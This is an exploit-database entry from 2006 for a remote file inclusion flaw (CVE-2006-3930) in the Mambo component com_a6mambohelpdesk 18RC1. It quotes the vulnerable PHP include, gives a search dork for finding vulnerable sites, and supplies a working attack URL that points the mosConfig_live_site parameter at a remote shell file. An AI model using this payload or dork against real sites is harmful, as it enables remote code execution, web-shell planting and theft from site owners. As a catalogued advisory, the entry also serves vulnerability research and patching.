Mambo Component 'com_a6mambohelpdesk' 18RC1 - Remote File Inclusion

Author: Dr.Jr7
type: webapps
platform: php
port: 
date_added: 2006-07-26 
date_updated: 2016-10-31 
verified: 1 
codes: OSVDB-27654;CVE-2006-3930 
tags: 
aliases:  
screenshot_url:  
application_url: 

a6mambohelpdesk Mambo Component <= 18RC1 Remote Include Vulnerability

# Rish : High
# Class : Remote
# Script : a6mambohelpdesk
# Thanx : www.lezr.com/vb

# codes

<?
include("$mosConfig_live_site/components/com_a6mambohelpdesk/about.html" );
?>

# d0rkiz : allinurl:"com_a6mambohelpdesk"

http://www.site.com/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://shell.txt


# by Dr.Jr7

# milw0rm.com [2006-07-27]